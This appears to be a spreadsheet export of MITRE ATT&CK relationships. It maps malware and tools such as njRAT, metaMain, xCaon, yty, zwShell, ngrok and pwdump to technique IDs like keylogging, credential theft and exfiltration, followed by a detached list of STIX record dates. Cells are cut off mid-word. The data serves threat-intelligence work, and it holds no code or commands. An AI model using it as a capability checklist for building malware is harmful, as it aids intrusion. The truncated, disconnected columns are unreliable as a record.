S1059 metaMain malware-- software uses T1056.001Keyloggingattack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1074.001Local Data attack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1112 Modify Regattack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1106 Native API attack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1095 Non-Applicattack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1205.001Port Knockattack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1057 Process Di attack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1055 Process Injattack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1620 Reflective attack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1113 Screen Capattack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1573.001Symmetric attack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1082 System Inf attack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1033 System Own attack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1497.003Time Basedattack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1070.006Timestompattack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1071.001Web Protocattack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1546.003Windows Ma attack-pat technique [metaMain](
S0102 nbtstat tool--b35 software uses T1016 System Netattack-pat technique [nbtstat](h
S0102 nbtstat tool--b35 software uses T1049 System Netattack-pat technique [nbtstat](h
S0108 netsh tool--5a63 software uses T1562.004Disable or attack-pat technique [netsh](htt
S0108 netsh tool--5a63 software uses T1546.007Netsh Helpattack-pat technique [netsh](htt
S0108 netsh tool--5a63 software uses T1090 Proxy attack-pat technique [netsh](htt
S0108 netsh tool--5a63 software uses T1518.001Security S attack-pat technique [netsh](htt
S0104 netstat tool--4664 software uses T1049 System Netattack-pat technique [netstat](h
S0508 ngrok tool--2f7f software uses T1568.002Domain Gen attack-pat technique [ngrok](ht
S0508 ngrok tool--2f7f software uses T1567 Exfiltratio attack-pat technique [ngrok](htt
S0508 ngrok tool--2f7f software uses T1572 Protocol T attack-pat technique [ngrok](ht
S0508 ngrok tool--2f7f software uses T1090 Proxy attack-pat technique [ngrok](ht
S0508 ngrok tool--2f7f software uses T1102 Web Servicattack-pat technique [ngrok](ht
S0385 njRAT malware--dsoftware uses T1010 Applicatio attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1070.009Clear Persiattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1027.004Compile Aftattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1555.003Credential attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1005 Data from attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1562.004Disable or attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1027.013Encrypted/attack-pat technique [njRAT](ht
S0385 njRAT malware--dsoftware uses T1041 Exfiltratio attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1568.001Fast Flux attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1070.004File Deleti attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1083 File and Di attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1105 Ingress Tooattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1056.001Keyloggingattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1112 Modify Regattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1106 Native API attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1571 Non-Standaattack-pat technique [njRAT](ht
S0385 njRAT malware--dsoftware uses T1120 Peripheral attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1059.001PowerShellattack-pat technique [njRAT](ht
S0385 njRAT malware--dsoftware uses T1057 Process Di attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1012 Query Regiattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1547.001Registry Ruattack-pat technique [njRAT](ht
S0385 njRAT malware--dsoftware uses T1021.001Remote Des attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1018 Remote Sysattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1091 Replicatio attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1113 Screen Capattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1132.001Standard Eattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1082 System Inf attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1033 System Own attack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1125 Video Captattack-pat technique [njRAT](htt
S0385 njRAT malware--dsoftware uses T1071.001Web Protocattack-pat technique [njRAT](ht
S0385 njRAT malware--dsoftware uses T1059.003Windows Cattack-pat technique [njRAT](htt
S0067 pngdownermalware-- software uses T1552.001Credentialsattack-pat technique If an initi
S0067 pngdownermalware-- software uses T1070.004File Deleti attack-pat technique [pngdowner
S0067 pngdownermalware-- software uses T1071.001Web Protocattack-pat technique [pngdowner
S0006 pwdump tool--9de software uses T1003.002Security A attack-pat technique [pwdump](h
S0103 route tool--c11a software uses T1016 System Netattack-pat technique [route](htt
S0111 schtasks tool--c970 software uses T1053.005Scheduled attack-pat technique [schtasks](
S0227 spwebmemtool--33b9software uses T1213.002Sharepointattack-pat technique [spwebmemb
S0225 sqlmap tool--9a26 software uses T1190 Exploit Pubattack-pat technique [sqlmap](ht
S0653 xCaon malware-- software uses T1547 Boot or Lo attack-pat technique [xCaon](ht
S0653 xCaon malware-- software uses T1005 Data from attack-pat technique [xCaon](htt
S0653 xCaon malware-- software uses T1140 Deobfuscatattack-pat technique [xCaon](htt
S0653 xCaon malware-- software uses T1105 Ingress Tooattack-pat technique [xCaon](htt
S0653 xCaon malware-- software uses T1106 Native API attack-pat technique [xCaon](htt
S0653 xCaon malware-- software uses T1518.001Security S attack-pat technique [xCaon](htt
S0653 xCaon malware-- software uses T1132.001Standard Eattack-pat technique [xCaon](htt
S0653 xCaon malware-- software uses T1573.001Symmetric attack-pat technique [xCaon](htt
S0653 xCaon malware-- software uses T1016 System Netattack-pat technique [xCaon](htt
S0653 xCaon malware-- software uses T1071.001Web Protocattack-pat technique [xCaon](ht
S0653 xCaon malware-- software uses T1059.003Windows Cattack-pat technique [xCaon](htt
S0123 xCmd tool--4fa4 software uses T1569.002Service Ex attack-pat technique [xCmd](http
S0248 yty malware--0software uses T1102.002Bidirectio attack-pat technique [yty](http
S0248 yty malware--0software uses T1027.001Binary Padattack-pat technique [yty](https
S0248 yty malware--0software uses T1005 Data from attack-pat technique [yty](https
S0248 yty malware--0software uses T1083 File and Di attack-pat technique [yty](https
S0248 yty malware--0software uses T1056.001Keyloggingattack-pat technique [yty](https
S0248 yty malware--0software uses T1057 Process Di attack-pat technique [yty](http
S0248 yty malware--0software uses T1018 Remote Sysattack-pat technique [yty](http
S0248 yty malware--0software uses T1053.005Scheduled attack-pat technique [yty](http
S0248 yty malware--0software uses T1113 Screen Capattack-pat technique [yty](https
S0248 yty malware--0software uses T1027.002Software Pattack-pat technique [yty](https
S0248 yty malware--0software uses T1497.001System Cheattack-pat technique [yty](https
S0248 yty malware--0software uses T1082 System Inf attack-pat technique [yty](http
S0248 yty malware--0software uses T1016 System Netattack-pat technique [yty](http
S0248 yty malware--0software uses T1033 System Own attack-pat technique [yty](https
S0350 zwShell malware-- software uses T1070.004File Deleti attack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1083 File and Di attack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1112 Modify Regattack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1021.001Remote Des attack-pat technique [zwShell](
S0350 zwShell malware-- software uses T1021.002SMB/Windo attack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1053.005Scheduled attack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1082 System Inf attack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1016 System Netattack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1033 System Own attack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1059.003Windows Cattack-pat technique [zwShell](h
S0350 zwShell malware-- software uses T1543.003Windows Se attack-pat technique [zwShell](h
STIX ID createdlast modified
relationsh 04 October04 October 2023
relationsh 27 Septem27 September 2023
relationsh 27 Septem27 September 2023
relationsh 27 Septem02 October 2023
relationsh 27 Septem27 September 2023
relationsh 27 Septem04 October 2023
relationsh 27 Septem27 September 2023
relationsh 02 October04 October 2023
relationsh 27 Septem02 October 2023
relationsh 27 Septem27 September 2023
relationsh 27 Septem04 October 2023
relationsh 27 Septem27 September 2023
relationsh 27 Septem02 October 2023
relationsh 27 Septem04 October 2023
relationsh 27 Septem04 October 2023
relationsh 27 Septem02 October 2023
relationsh 27 Septem27 September 2023
relationsh 31 March 10 April 2023
relationsh 31 March 14 April 2023
relationsh 31 March 10 April 2023
relationsh 31 March 07 April 2023
relationsh 31 March 07 April 2023
relationsh 31 March 07 April 2023
relationsh 31 March 14 April 2023
relationsh 31 March 07 April 2023
relationsh 05 August 05 August 2024
relationsh 14 April 2014 April 2023
relationsh 31 March 31 March 2023
relationsh 31 March 31 March 2023
relationsh 31 March 10 April 2023
relationsh 31 March 14 April 2023
relationsh 31 March 07 April 2023
relationsh 31 March 07 April 2023
relationsh 31 March 07 April 2023
relationsh 31 March 10 April 2023
relationsh 31 March 07 April 2023
relationsh 31 March 07 April 2023
relationsh 31 March 14 April 2023
relationsh 27 March 17 April 2024
relationsh 17 April 2017 April 2024
relationsh 27 March 17 April 2024
relationsh 27 March 17 April 2024
relationsh 17 April 2017 April 2024
relationsh 27 March 17 April 2024
relationsh 27 March 17 April 2024
relationsh 27 March 17 April 2024
relationsh 27 March 17 April 2024
relationsh 27 March 17 April 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 21 Septem21 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 16 Septem16 September 2024
relationsh 04 October04 October 2022
relationsh 04 October04 October 2022
relationsh 21 Septem04 October 2022
relationsh 13 October13 October 2022
relationsh 04 October04 October 2022
relationsh 04 October05 October 2022
relationsh 04 October04 October 2022
relationsh 04 October04 October 2022
relationsh 04 October04 October 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem22 September 2022
relationsh 30 Septem30 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem14 October 2022
relationsh 29 Septem30 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 03 October03 October 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 14 October14 October 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 29 Septem29 September 2022
relationsh 13 Decemb13 December 2022
relationsh 26 January26 January 2023
relationsh 10 Februar10 February 2023
relationsh 26 January26 January 2023
relationsh 19 Decemb19 December 2022
relationsh 04 January26 January 2023
relationsh 03 January03 January 2023
relationsh 04 January04 January 2023
relationsh 01 Decemb26 January 2023
relationsh 26 January26 January 2023
relationsh 13 Decemb25 January 2023
relationsh 09 Decemb09 December 2022
relationsh 13 Decemb13 December 2022
relationsh 10 April 2010 April 2023
relationsh 20 Decemb25 January 2023
relationsh 19 Decemb25 January 2023
relationsh 26 January10 April 2023
relationsh 04 January04 January 2023
relationsh 26 January26 January 2023
relationsh 13 Decemb25 January 2023
relationsh 19 Decemb19 December 2022
relationsh 03 January26 January 2023
relationsh 03 January03 January 2023
relationsh 03 January03 January 2023
relationsh 09 Decemb26 January 2023
relationsh 13 Decemb13 December 2022
relationsh 03 January04 January 2023
relationsh 09 Decemb09 December 2022
relationsh 03 January03 January 2023
relationsh 17 January07 April 2023
relationsh 17 January15 February 2023
relationsh 17 January14 February 2023
relationsh 17 January14 February 2023
relationsh 17 January14 February 2023
relationsh 24 January14 February 2023
relationsh 14 Februar14 February 2023
relationsh 17 January14 February 2023
relationsh 07 April 2007 April 2023
relationsh 17 January14 February 2023
relationsh 17 January14 February 2023
relationsh 17 January14 February 2023
relationsh 24 January14 February 2023
relationsh 17 January14 February 2023
relationsh 17 January14 February 2023
relationsh 17 January14 February 2023
relationsh 14 Februar14 February 2023
relationsh 14 Februar14 February 2023
relationsh 14 Februar07 April 2023
relationsh 20 March 22 March 2023
relationsh 20 March 22 March 2023
relationsh 20 March 22 March 2023
relationsh 20 March 22 March 2023
relationsh 20 March 22 March 2023
relationsh 05 April 2005 April 2023
relationsh 05 April 2005 April 2023
relationsh 20 March 22 March 2023
relationsh 20 March 05 April 2023
relationsh 20 March 22 March 2023
relationsh 20 March 05 April 2023
relationsh 17 March 05 April 2023
relationsh 20 March 22 March 2023
relationsh 17 March 22 March 2023
relationsh 05 April 2005 April 2023
relationsh 19 May 20 29 September 2023
relationsh 25 July 20 25 July 2023
relationsh 22 May 20 22 May 2023
relationsh 15 May 20 25 July 2023
relationsh 19 May 20 19 May 2023
relationsh 25 July 20 25 July 2023
relationsh 12 July 20 22 September 2023
relationsh 07 July 20 25 March 2024
relationsh 22 Septem22 September 2023
relationsh 10 October10 October 2023
relationsh 12 July 20 22 September 2023
relationsh 07 July 20 22 September 2023
relationsh 22 Septem22 September 2023
relationsh 07 July 20 22 September 2023
relationsh 12 July 20 22 September 2023
relationsh 22 Septem22 September 2023
relationsh 07 July 20 07 July 2023
relationsh 12 July 20 12 July 2023
relationsh 05 July 20 07 July 2023
relationsh 05 July 20 22 September 2023
relationsh 20 Septem25 March 2024
relationsh 12 July 20 22 September 2023
relationsh 07 July 20 07 July 2023
relationsh 10 July 20 22 September 2023
relationsh 12 July 20 22 September 2023
relationsh 10 July 20 10 July 2023
relationsh 22 Septem22 September 2023
relationsh 22 Septem22 September 2023
relationsh 07 July 20 07 July 2023
relationsh 22 Septem22 September 2023
relationsh 30 Septem30 September 2023
relationsh 07 July 20 22 September 2023
relationsh 12 July 20 12 July 2023
relationsh 12 July 20 02 October 2023
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 17 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 28 March 10 April 2024
relationsh 05 October05 October 2022
relationsh 05 October05 October 2022
relationsh 12 October12 October 2022
relationsh 05 October05 October 2022
relationsh 05 October12 October 2022
relationsh 15 Septem05 October 2022
relationsh 15 Septem05 October 2022
relationsh 15 Septem05 October 2022
relationsh 15 Septem05 October 2022
relationsh 15 Septem05 October 2022
relationsh 11 March 11 March 2024
relationsh 01 March 11 March 2024
relationsh 01 March 12 March 2024
relationsh 11 March 11 March 2024
relationsh 05 March 11 March 2024
relationsh 06 March 17 April 2024
relationsh 05 March 05 March 2024
relationsh 12 March 11 April 2024
relationsh 01 March 13 March 2024
relationsh 12 March 12 March 2024
relationsh 07 March 17 April 2024
relationsh 05 March 05 March 2024
relationsh 05 March 28 March 2024
relationsh 06 March 28 March 2024
relationsh 06 March 06 March 2024
relationsh 05 March 17 April 2024
relationsh 12 March 13 March 2024
relationsh 13 March 13 March 2024
relationsh 11 March 11 March 2024
relationsh 06 March 12 March 2024
relationsh 06 March 06 March 2024
relationsh 06 March 28 March 2024
relationsh 06 March 06 March 2024
relationsh 06 March 06 March 2024
relationsh 12 March 12 March 2024
relationsh 12 March 12 March 2024
relationsh 01 March 28 March 2024
relationsh 13 March 28 March 2024
relationsh 12 March 12 March 2024
relationsh 06 March 06 March 2024
relationsh 01 March 28 March 2024
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem22 March 2023
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 20 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 19 Septem19 September 2022
relationsh 07 Septem21 September 2022
relationsh 07 Septem21 September 2022
relationsh 23 Septem10 October 2022
relationsh 10 October10 October 2022
relationsh 10 October10 October 2022
relationsh 11 October11 October 2022
relationsh 10 October13 October 2022
relationsh 21 Septem10 October 2022
relationsh 21 Septem10 October 2022
relationsh 21 Septem10 October 2022
relationsh 21 Septem10 October 2022
relationsh 21 Septem10 October 2022
relationsh 13 October13 October 2022
relationsh 10 October10 October 2022
relationsh 21 Septem10 October 2022
relationsh 21 Septem10 October 2022
relationsh 14 August 21 August 2024
relationsh 12 August 12 August 2024
relationsh 09 August 13 August 2024
relationsh 14 August 14 August 2024
relationsh 14 August 14 August 2024
relationsh 14 August 14 August 2024
relationsh 13 August 13 August 2024
relationsh 13 August 13 August 2024
relationsh 13 August 21 August 2024
relationsh 13 August 14 August 2024
relationsh 14 August 14 August 2024
relationsh 13 August 13 August 2024
relationsh 13 August 13 August 2024
relationsh 13 August 21 August 2024
relationsh 13 August 14 August 2024
relationsh 13 August 14 August 2024
relationsh 13 August 14 August 2024
relationsh 13 August 14 August 2024
relationsh 13 August 14 August 2024
relationsh 14 August 14 August 2024
relationsh 13 August 14 August 2024
relationsh 13 August 13 August 2024
relationsh 13 August 14 August 2024
relationsh 13 August 21 August 2024
relationsh 14 August 14 August 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 03 October03 October 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 03 October03 October 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 10 June 2010 June 2024
relationsh 22 Septem22 September 2022
relationsh 08 Septem08 September 2022
relationsh 08 Septem08 September 2022
relationsh 22 Septem22 September 2022
relationsh 08 Septem11 April 2024
relationsh 08 Septem08 September 2022
relationsh 08 Septem08 September 2022
relationsh 22 Septem22 September 2022
relationsh 06 October06 October 2022
relationsh 22 Septem22 September 2022
relationsh 06 October06 October 2022
relationsh 08 Septem08 September 2022
relationsh 08 Septem08 September 2022
relationsh 06 October06 October 2022
relationsh 08 Septem28 September 2022
relationsh 22 Septem22 September 2022
relationsh 08 Septem08 September 2022
relationsh 08 Septem08 September 2022
relationsh 08 Septem28 September 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem28 September 2022
relationsh 08 Septem08 September 2022
relationsh 08 Septem08 September 2022
relationsh 06 October06 October 2022
relationsh 08 Septem08 September 2022
relationsh 22 Septem22 September 2022
relationsh 08 Septem08 September 2022
relationsh 08 Septem08 September 2022
relationsh 06 October06 October 2022
relationsh 22 Septem06 October 2022
relationsh 13 October22 March 2023
relationsh 22 Septem06 October 2022
relationsh 06 October06 October 2022
relationsh 27 Septem06 October 2022
relationsh 06 October06 October 2022
relationsh 22 Septem06 October 2022
relationsh 22 Septem13 October 2022
relationsh 22 Septem06 October 2022
relationsh 24 March 24 March 2023
relationsh 22 Septem13 October 2022
relationsh 22 Septem06 October 2022
relationsh 06 October06 October 2022
relationsh 22 Septem06 October 2022
relationsh 06 October06 October 2022
relationsh 06 October06 October 2022
relationsh 06 October06 October 2022
relationsh 06 October06 October 2022
relationsh 06 October07 October 2022
relationsh 22 Septem06 October 2022
relationsh 22 Septem06 October 2022
relationsh 22 Septem06 October 2022
relationsh 22 Septem06 October 2022
relationsh 06 October06 October 2022
relationsh 06 October06 October 2022
relationsh 06 October06 October 2022
relationsh 06 October06 October 2022
relationsh 06 October06 October 2022
relationsh 22 Septem06 October 2022
relationsh 22 Septem06 October 2022
relationsh 22 Septem06 October 2022
relationsh 27 Septem06 October 2022
relationsh 06 October06 October 2022
relationsh 17 March 17 March 2023
relationsh 17 March 07 April 2023
relationsh 17 March 17 March 2023
relationsh 17 March 17 March 2023
relationsh 10 April 2010 April 2023
relationsh 17 March 17 March 2023
relationsh 10 April 2010 April 2023
relationsh 17 March 10 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 11 April 2024
relationsh 17 March 10 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 17 March 2023
relationsh 17 March 17 March 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 17 March 2023
relationsh 10 April 2010 April 2023
relationsh 20 Septem28 September 2023
relationsh 17 March 17 March 2023
relationsh 10 April 2010 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 17 March 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 13 April 2023
relationsh 17 March 13 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 17 March 2023
relationsh 17 March 07 April 2023
relationsh 17 March 13 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 17 March 2023
relationsh 10 April 2010 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 10 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 17 March 17 March 2023
relationsh 17 March 07 April 2023
relationsh 17 March 17 March 2023
relationsh 17 March 07 April 2023
relationsh 17 March 07 April 2023
relationsh 29 Septem29 September 2022
relationsh 30 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 29 Septem11 April 2024
relationsh 29 Septem30 September 2022
relationsh 29 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 29 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 30 Septem30 September 2022
relationsh 29 Septem30 September 2022
relationsh 29 Septem30 September 2022
relationsh 23 March 23 March 2023
relationsh 23 March 23 March 2023
relationsh 06 April 2006 April 2023
relationsh 06 April 2006 April 2023
relationsh 06 April 2006 April 2023
relationsh 13 April 2013 April 2023
relationsh 23 March 13 April 2023
relationsh 23 March 23 March 2023
relationsh 19 Septem19 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 11 October11 October 2022
relationsh 13 October13 October 2022
relationsh 16 Septem11 April 2024
relationsh 19 Septem19 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 19 Septem19 September 2022
relationsh 19 Septem19 September 2022
relationsh 19 Septem19 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 13 October13 October 2022
relationsh 16 Septem16 September 2022
relationsh 19 Septem19 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem13 October 2022
relationsh 16 Septem13 October 2022
relationsh 16 Septem19 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 11 October11 October 2022
relationsh 13 October13 October 2022
relationsh 26 Septem26 September 2022
relationsh 26 Septem26 September 2022
relationsh 26 Septem26 September 2022
relationsh 13 October13 October 2022
relationsh 26 Septem26 September 2022
relationsh 13 October13 October 2022
relationsh 26 Septem13 October 2022
relationsh 26 Septem26 September 2022
relationsh 26 Septem27 September 2022
relationsh 26 Septem26 September 2022
relationsh 26 Septem26 September 2022
relationsh 26 Septem26 September 2022
relationsh 13 October13 October 2022
relationsh 05 October05 October 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem11 April 2024
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 13 October13 October 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 16 Septem16 September 2022
relationsh 13 October13 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem22 March 2023
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 07 October07 October 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 07 October07 January 2023
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem07 October 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 27 Septem27 September 2022
relationsh 17 July 20 12 August 2024
relationsh 17 July 20 17 July 2024
relationsh 17 July 20 17 July 2024
relationsh 17 July 20 17 July 2024
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 26 March 26 March 2023
relationsh 27 March 27 March 2023
relationsh 26 March 26 March 2023
